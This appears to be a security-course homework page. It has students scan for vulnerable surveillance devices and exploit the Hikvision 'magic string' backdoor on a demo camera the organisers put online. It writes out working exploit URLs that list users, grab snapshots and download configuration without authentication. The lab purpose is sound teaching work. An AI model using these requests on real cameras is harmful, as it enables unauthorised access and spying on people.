This assignment has two parts; scan for vulnerabilities and hack our camera.
Part 1: Scan for Vulnerabilities
Using the recently released IPVM Vulnerability Scanner check your network for vulnerable devices.
Download it from the options below:
Below is a demonstration of the scanner:
Post Your Results
I performed my scan on our network that houses vulnerable equipment, so the scanner found several devices. If you do not have access to a surveillance network to scan, then you can scan our camera by manually entering 64.121.14.17.
Part 2: Hack Our Camera!
This week we discussed cyber security and hacking. One of the most recent and widespread backdoor exploits is the Hikvision magic string. In this homework assignment you will access a Hikvision camera running vulnerable firmware.
IPVM has put a vulnerable Hikvision camera online for members to experiment with. Access details are:
http://hikvisionbackdoor.dyndns.org [NOTE: will show login page with strong admin password]. However due to the backdoor exploit actors can now execute Hikvision CGI commands by simply appending a string that authorizes access to the camera. Some examples are below (replace "camera.ip" with the actual IP address or URL to the camera):
Retrieve a list of all users and their roles:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
And worst of all, one can download camera configuration:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
You can also use an app that was developed to change the password. See how creative you can get with this (without disabling the camera) and post your results here!
Post Your Results
Here is an example of what homework submissions should look like.
I used the app to change the password:
With access to the camera I then changed the OSD:
Please do not attempt this on any camera other than our demo camera, and keep results professional. If you have any questions please let us know - we are happy to help.